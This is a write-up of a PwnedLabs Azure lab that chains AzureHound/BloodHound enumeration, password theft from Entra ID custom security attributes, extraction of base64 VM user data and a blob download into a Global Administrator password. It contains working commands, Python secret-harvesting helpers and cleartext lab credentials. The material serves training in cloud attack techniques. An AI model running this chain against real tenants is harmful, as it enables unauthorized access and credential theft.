3. Azure with Bloodhound and Microsoft.Graph

This write-up is based on PwnedLabs.io’s free module, Azure Blob Container to Initial Access, which offers top-notch content at an unbeatable price. While I’m not affiliated with PwnedLabs.io, I highly recommend their resources. Learn more about their subscription options at PwnedLabs.io/pricing.


A great line from John Lambert (@JohnLaTwC) that sums up why BloodHound exists:
Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win.

1. Prep

Install the BloodHound GUI and start the Neo4j database it stores the graph in:

sudo apt-get install bloodhound

sudo neo4j console

Download the AzureHound collector from its releases page:

https://github.com/bloodhoundad/azurehound/releases

2. Run azurehound

Usernames were given. The tenant ID was retrieved once we logged in with the given credentials. Note that az login -u/-p uses the resource owner password credential flow: it is rejected for accounts that require MFA, and the password lands in the shell history.

az login -u Jose.*****@megabigtech.com -p *****!

[
  {
    "cloudName": "AzureCloud",
    "homeTenantId": "2590ccef-687d-493b-ae8d-441cbab63a72",
    "id": "ceff06cb-e29d-4486-a3ae-eaaec5689f94",
    "isDefault": true,
    "managedByTenants": [],
    "name": "Microsoft Azure Sponsorship",
    "state": "Enabled",
    "tenantDefaultDomain": "megabigtech.com",
    "tenantDisplayName": "Default Directory",
    "tenantId": "2590ccef-687d-493b-ae8d-441cbab63a72",
    "user": {
      "name": "Jose.Rodriguez@megabigtech.com",
      "type": "user"
    }
  }
]


./azurehound -u "Jose.*****@megabigtech.com" -p '*****!' list --tenant "2590ccef-687d-493b-ae8d-441cbab63a72" -o output.json

list with no subcommand collects everything AzureHound supports (Entra ID objects, subscriptions, resources and role assignments) into one file; list az-ad or list az-rm restricts it to the Entra ID or Resource Manager side.

2.1 Troubleshoot: forgotten Neo4j password

BloodHound logs in to Neo4j, so if you have forgotten the Neo4j password, reset it with the recovery procedure:
https://neo4j.com/docs/operations-manual/current/authentication-authorization/password-and-user-recovery/#post-recovery

3. BloodHound GUI

Log in and upload output.json to the BloodHound GUI. The Azure information is now visible.

A total of five admin roles are observed. Four are identified on the Microsoft website or in
../Azure General/Built-in Permissions.

However, I was not able to get information on Update Manager. Possibly it is not a built-in role.

Clicking a role node shows more about that role.

3.1 BloodHound Custom Query

A good list of custom queries is here; I put it into table format: ../Azure General/Tool - BloodHound AzureHoundCustomQuery

Azure Global Administrator role (the AZGlobalAdmin edge runs from the principal that holds the role to the AZTenant node):

MATCH p =(n)-[r:AZGlobalAdmin*1..]->(m) RETURN p
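As an added illustration of the graph-versus-list point, here is a small Python path search over AzureHound-style edges. This is example code written for this write-up, not BloodHound's or AzureHound's own code; the nodes and edges are constructed and the names are invented, although the edge kinds AZMemberOf, AZOwns and AZGlobalAdmin are the real AzureHound ones. The Cypher query above answers the list question (who holds Global Administrator); the search below also answers the graph question BloodHound's path queries answer (who can reach a holder, for instance by owning a role-assignable group and adding themselves to it):

```python
from collections import deque

# Constructed sample graph for this example (names invented). Edge kinds follow
# the AzureHound schema: AZMemberOf (group membership), AZOwns (group ownership,
# owners can add members), AZGlobalAdmin (holds Global Administrator on the tenant).
TENANT = "AZTenant:megabigtech.com"
EDGES = [
    ("AZUser:jose",         "AZMemberOf",    "AZGroup:IT-HELPDESK"),
    ("AZUser:jose",         "AZOwns",        "AZGroup:Role-Admins"),  # role-assignable group
    ("AZGroup:Role-Admins", "AZGlobalAdmin", TENANT),
    ("AZUser:dana",         "AZMemberOf",    "AZGroup:Role-Admins"),
    ("AZUser:ryan",         "AZGlobalAdmin", TENANT),
    ("AZUser:archive",      "AZMemberOf",    "AZGroup:Archive-Readers"),
]


def build_graph(edges):
    """Adjacency list: node -> [(edge_kind, target), ...]."""
    graph = {}
    for src, kind, dst in edges:
        graph.setdefault(src, []).append((kind, dst))
        graph.setdefault(dst, [])
    return graph


def shortest_path(graph, start, goal):
    """Breadth-first search; returns [(src, edge_kind, dst), ...] or None."""
    parents = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            path = []
            while parents[node] is not None:
                prev, kind = parents[node]
                path.append((prev, kind, node))
                node = prev
            return path[::-1]
        for kind, nxt in graph.get(node, []):
            if nxt not in parents:
                parents[nxt] = (node, kind)
                queue.append(nxt)
    return None


def direct_global_admins(graph, tenant):
    """The 'list' view: principals with an AZGlobalAdmin edge straight to the tenant."""
    return sorted(src for src, edges in graph.items()
                  for kind, dst in edges if kind == "AZGlobalAdmin" and dst == tenant)


def global_admin_paths(graph, tenant):
    """The 'graph' view: every node that can reach Global Administrator, with its path."""
    paths = {}
    for node in graph:
        if node == tenant:
            continue
        path = shortest_path(graph, node, tenant)
        if path:
            paths[node] = path
    return paths


if __name__ == "__main__":
    graph = build_graph(EDGES)
    print("Direct Global Admins:", direct_global_admins(graph, TENANT))
    for node, path in sorted(global_admin_paths(graph, TENANT).items()):
        print(node, "->", " -> ".join(f"[{kind}] {dst}" for _, kind, dst in path))
```

In the constructed graph the list view names only ryan and the Role-Admins group, while the graph view also surfaces jose (owner of the group) and dana (member of it). That difference is exactly what the GUI shows when you expand a role node.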

4. Get Credentials with Microsoft.Graph

# Install the Microsoft Graph PowerShell SDK
Install-Module Microsoft.Graph

# Connect to Microsoft Graph. Reading customSecurityAttributes needs the
# CustomSecAttributeAssignment.Read.All permission (plus a directory role such as
# Attribute Assignment Reader) on top of User.Read.All.
Connect-MgGraph -Scopes "User.Read.All","CustomSecAttributeAssignment.Read.All"

# Retrieve all users, selecting the custom security attributes in the same call
# (customSecurityAttributes is only returned when explicitly selected, and this
# avoids one extra request per user)
$allUsers = Get-MgUser -All -Property Id,UserPrincipalName,customSecurityAttributes

# Loop through all users and display the attribute sets assigned to each
foreach ($user in $allUsers) {
    Write-Host "User: $($user.UserPrincipalName)"
    $user.CustomSecurityAttributes.AdditionalProperties | Format-List
    Write-Host "---------------------------------------------"
}

This will return

...snip...

User: archive@megabigtech.com                                                                                                                                
Key   : Helpdesk                                                                                                                                             
Value : {[@odata.type, #microsoft.graph.customSecurityAttributeValue], [Password, *****!!]} 


...snip...

Or, as a one-liner for a single user:

(Get-MgUser -UserId "archive@megabigtech.com" -Property "customSecurityAttributes").CustomSecurityAttributes.AdditionalProperties | Format-List

Key   : Helpdesk
Value : {[@odata.type, #microsoft.graph.customSecurityAttributeValue], [Password, D4taS3cur1ty!!]}

4.1 Getting credentials with Select-Object

I attempted to get the same result using a Select-Object query, but the result was not the same, and I was unsure what the difference was.

(Get-MgUser -UserId "archive@megabigtech.com" | Select-Object -Property *).AdditionalProperties

It turns out Select-Object -Property * doesn't return the attributes for two reasons: the request above never asked Graph for customSecurityAttributes (it is returned only when selected with -Property), and -Property * only captures the top-level members of the user object, while the values sit in AdditionalProperties nested inside CustomSecurityAttributes. Select the property and expand it:

(Get-MgUser -UserId "archive@megabigtech.com" -Property "customSecurityAttributes" | Select-Object -ExpandProperty CustomSecurityAttributes).AdditionalProperties

5. Let's use the GUI!

5.1 Get user information

From the Azure portal home page, go to the Users service, then select the archive user.

5.2 Get group information

From the home page, search for the Microsoft Entra ID service, then select Manage, followed by Groups.

From the Azure role assignments tab of the IT-HELPDESK group, we confirmed that the group has the Reader role on the resource SECURITY-PC. I was not able to get this information from BloodHound: it only draws edges for rights it can abuse (Owner, Contributor, User Access Administrator, VM Contributor and so on), so a plain Reader assignment never appears as an edge, even though Reader is enough to view the VM's properties. With that access the VM's user data can be read (5.3 shows how to pull it with PowerShell); decoded, it contains:

# Credentials: User: security-user | Password: Imp0sec0sT!
az storage blob download --account-name securityconfigs --container-name security-pc --name config-latest.xml --auth-mode login

5.2.1 Get the role assignment using Az PowerShell

With no parameters, Get-AzRoleAssignment lists every assignment the caller can see in the current subscription; the relevant one is the Reader assignment for IT-HELPDESK scoped to the VM:

PS> Get-AzRoleAssignment

RoleAssignmentName : 4b5ae432-6902-4ca2-bbed-815492eef631
RoleAssignmentId   : /subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94/resourcegroups/content-static-2/providers/Microsoft.Compute/virtualMachines/SECURITY-PC/providers/Microsoft.Authorization/roleAssignments/4b5ae432-6902-4ca2-bbed-815492eef631
Scope              : /subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94/resourcegroups/content-static-2/providers/Microsoft.Compute/virtualMachines/SECURITY-PC
DisplayName        : IT-HELPDESK
SignInName         : 
RoleDefinitionName : Reader
RoleDefinitionId   : acdd72a7-3385-48ef-bd42-f606fba81ae7
ObjectId           : 8a517e87-6b05-45ae-b1ca-7436f1682602
ObjectType         : Group
CanDelegate        : False
Description        : 
ConditionVersion   : 
Condition          : 

5.3 Get resource information for the virtual machine

../Azure Services/Azure Virtual Machine

I attempted to get the same info using az or Get-AzVM with the following, but had no luck with either:

(Get-AzVM -ResourceGroupName "CONTENT-STATIC-2" -Name "SECURITY-PC").OSProfile.CustomData

az vm user-data show --name <VMName> --resource-group <ResourceGroupName>

Neither can work: customData is write-only through Resource Manager (it is delivered to the VM at provisioning and never returned by a GET), so OSProfile.CustomData is always empty from the control plane, and az vm user-data show is not an az command. User data, by contrast, is returned to anyone with read access to the VM once it is explicitly requested. In az that is:

az vm show --resource-group content-static-2 --name SECURITY-PC --include-user-data --query userData -o tsv

In Az PowerShell it is the -UserData switch, which is what I needed:

Get-AzVM -ResourceGroupName "content-static-2" -Name "SECURITY-PC" -UserData


ResourceGroupName : content-static-2
Id                : /subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94/resourceGroups/content-static-2/providers/Microsoft.Compute/virtualMachines/SECURITY-PC
VmId              : 648c8a08-c90a-4a95-8922-4cbf28375bcb
Name              : SECURITY-PC
Type              : Microsoft.Compute/virtualMachines
Location          : eastus
LicenseType       : Windows_Client
Tags              : {}
HardwareProfile   : {VmSize}
NetworkProfile    : {NetworkInterfaces}
SecurityProfile   : {UefiSettings, SecurityType}
OSProfile         : {ComputerName, AdminUsername, WindowsConfiguration, Secrets, AllowExtensionOperations, RequireGuestProvisionSignal}
ProvisioningState : Succeeded
StorageProfile    : {ImageReference, OsDisk, DataDisks, DiskControllerType}
Identity          : {PrincipalId, TenantId, Type}
Zones             : {1}
UserData          : IyBDcmVkZW50aWFsczogVXNlcjogc2VjdXJpdHktdXNlciB8IFBhc3N3b3JkOiBJbXAwc2VjMHNUIQpheiBzdG9yYWdlIGJsb2IgZG93bmxvYWQgLS1hY2NvdW50LW5hbWUgc2VjdXJpdHljb25maWdzIC0tY29udGFpbmVyLW5hbWUgc2VjdXJpdHktcGMgLS1uYW1lIGNvbmZpZy1sYXRlc3QueG1sIC0tYXV0aC1tb2RlIGxvZ2luCg==
TimeCreated       : 10/31/2023 3:24:18PM
Etag              : "16"

Then decode it. There is no GetStringFromBase64String method on the encoding class; convert the base64 to bytes with [System.Convert]::FromBase64String and decode those as UTF-8:

[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("IyBDcmVkZW50aWFsczogVXNlcjogc2VjdXJpdHktdXNlciB8IFBhc3N3b3JkOiBJbXAwc2VjMHNUIQpheiBzdG9yYWdlIGJsb2IgZG93bmxvYWQgLS1hY2NvdW50LW5hbWUgc2VjdXJpdHljb25maWdzIC0tY29udGFpbmVyLW5hbWUgc2VjdXJpdHktcGMgLS1uYW1lIGNvbmZpZy1sYXRlc3QueG1sIC0tYXV0aC1tb2RlIGxvZ2luCg=="))
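To do the same across every VM the account can read, here is an added Python triage helper (example code for this write-up, not part of the lab or of the Az module). It takes VM records in the shape az vm show --include-user-data -o json prints (top-level name, resourceGroup and userData; that shape is an assumption of the example), base64-decodes the user data and flags credential-looking lines. The SECURITY-PC record carries the real base64 value shown above; the other two records are constructed to exercise the empty and malformed cases.

```python
import base64
import binascii
import re

# Constructed VM records in the shape of az vm show --include-user-data -o json.
# The first userData value is the string returned for SECURITY-PC above; the
# other two records are made up to cover "no user data" and "not base64".
SAMPLE_VMS = [
    {"name": "SECURITY-PC", "resourceGroup": "content-static-2",
     "userData": "IyBDcmVkZW50aWFsczogVXNlcjogc2VjdXJpdHktdXNlciB8IFBhc3N3b3JkOiBJbXAwc2VjMHNUIQpheiBzdG9yYWdlIGJsb2IgZG93bmxvYWQgLS1hY2NvdW50LW5hbWUgc2VjdXJpdHljb25maWdzIC0tY29udGFpbmVyLW5hbWUgc2VjdXJpdHktcGMgLS1uYW1lIGNvbmZpZy1sYXRlc3QueG1sIC0tYXV0aC1tb2RlIGxvZ2luCg=="},
    {"name": "WEB-01", "resourceGroup": "content-static-2", "userData": None},
    {"name": "BAD-01", "resourceGroup": "content-static-2", "userData": "not base64!"},
]

# Matches "Password: x", "secret=x", "token: x" and similar in the decoded text
SECRET_RE = re.compile(r"(?i)\b(password|passwd|pwd|secret|token|apikey)\s*[:=]\s*(\S+)")


def decode_user_data(value):
    """Base64-decode a userData value; None when it is absent or not valid base64.

    customData is never returned by Resource Manager, so userData is the only
    provisioning blob worth pulling from outside the VM.
    """
    if not value:
        return None
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def find_secrets(text):
    """Return (field, value) pairs for credential-looking tokens in text."""
    return [(m.group(1).lower(), m.group(2)) for m in SECRET_RE.finditer(text)]


def triage(vms):
    """Decode every VM's user data; collect (resourceGroup, vm, field, value)."""
    findings = []
    for vm in vms:
        text = decode_user_data(vm.get("userData"))
        if text is None:
            continue
        for field, value in find_secrets(text):
            findings.append((vm["resourceGroup"], vm["name"], field, value))
    return findings


if __name__ == "__main__":
    # In the field, build the list by running
    #   az vm show --include-user-data -o json
    # for each VM named by az vm list, since the list output does not carry userData.
    for rg, name, field, value in triage(SAMPLE_VMS):
        print(f"{rg}/{name}: {field} = {value}")
```

Malformed or missing user data is skipped rather than raising, so one odd VM does not stop the sweep; widen SECRET_RE to whatever naming the target environment uses.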

6. Check the blob!

../Azure Services/Azure Storage Account

# Credentials: User: security-user | Password: *****!

Log out, log in as security-user and download the blob. --auth-mode login authenticates to the storage data plane with the signed-in account's Entra ID token and Azure RBAC (security-user needs a data role such as Storage Blob Data Reader on the account or container) instead of an account key or SAS; with no --file argument the content is written to stdout:

az logout

az login -u security-user@megabigtech.com -p *****!
az storage blob download --account-name securityconfigs --container-name security-pc --name config-latest.xml --auth-mode login
<?xml version="1.0" encoding="UTF-8"?>
<SecurityConfiguration>
    <!-- Resource Group Settings -->
    <ResourceGroup>
        <Name>MegaTechResourceGroup</Name>
        <Location>East US</Location>
        <Description>Primary resource group for Mega Big Tech security application.</Description>
    </ResourceGroup>

    <!-- Tenant and Subscription Information -->
    <Tenant>
        <ID>12345678-1234-1234-1234-123456789012</ID>
        <Name>MegaBigTechTenant</Name>
        <Subscription>
            <ID>abcd1234-abcd-1234-abcd-1234abcd1234</ID>
            <Name>MegaTechSecuritySubscription</Name>
            <Type>Premium</Type>
            <StartDate>2023-01-01</StartDate>
            <EndDate>2024-01-01</EndDate>
        </Subscription>
    </Tenant>

    <!-- Alerting Settings -->
    <Alerting>
        <Email>securityalerts@megabigtech.com</Email>
        <SMTPServer>
            <Address>smtp.megabigtech.com</Address>
            <Port>587</Port>
        </SMTPServer>
        <Thresholds>
            <CPUUsage>90</CPUUsage> <!-- Percentage -->
            <MemoryUsage>90</MemoryUsage> <!-- Percentage -->
            <DiskSpace>10</DiskSpace> <!-- Remaining GB -->
        </Thresholds>
    </Alerting>

    <!-- Global Admin Account Credentials -->
    <GlobalAdmin>
        <Username>ryan@megabigtech.com</Username>
        <Password>AzureAdmin12345!</Password>
        <Email>ryan@megabigtech.com</Email>
        <TwoFactorAuthentication>Enabled</TwoFactorAuthentication>
    </GlobalAdmin>

    <!-- Logging Settings -->
    <Logging>
        <Level>Verbose</Level> <!-- Can be Verbose, Info, Warning, Error, Critical -->
        <RetentionPeriod>90</RetentionPeriod> <!-- Days -->
        <LogPath>/var/logs/security_app/</LogPath>
    </Logging>

    <!-- Database Configuration -->
    <Database>
        <Type>SQL</Type>
        <ConnectionString>Server=megabigtech.database.windows.net;Database=SecurityDB;User Id=dbuser;Password=dbp@ssword;</ConnectionString>
        <Backup>
            <Schedule>Daily</Schedule>
            <BackupPath>/backups/security_app/</BackupPath>
            <RetentionPeriod>30</RetentionPeriod> <!-- Days -->
        </Backup>
    </Database>

    <!-- Firewall Settings -->
    <Firewall>
        <Status>Enabled</Status>
        <AllowedIPs>
            <IP>14.24.156.58</IP>
            <IP>35.125.4.26</IP>
        </AllowedIPs>
    </Firewall>
</SecurityConfiguration>


The config hands over a Global Administrator password for ryan@megabigtech.com and a SQL connection string with the dbuser password. Note the TwoFactorAuthentication flag: if MFA is enforced for ryan, az login -u/-p with this password will be rejected.

For fun, let's get more info about archive. The account has no subscription, so az login needs --allow-no-subscriptions to complete a tenant-level login:

PS> az login -u ar*****@megabigtech.com --password ***** --allow-no-subscriptions


2590ccef-687d-493b-ae8d-441cbab63a72 'Default Directory'
[
  {
    "cloudName": "AzureCloud",
    "id": "2590ccef-687d-493b-ae8d-441cbab63a72",
    "isDefault": true,
    "name": "N/A(tenant level account)",
    "state": "Enabled",
    "tenantId": "2590ccef-687d-493b-ae8d-441cbab63a72",
    "user": {
      "name": "arc*****@megabigtech.com",
      "type": "user"
    }
  }
]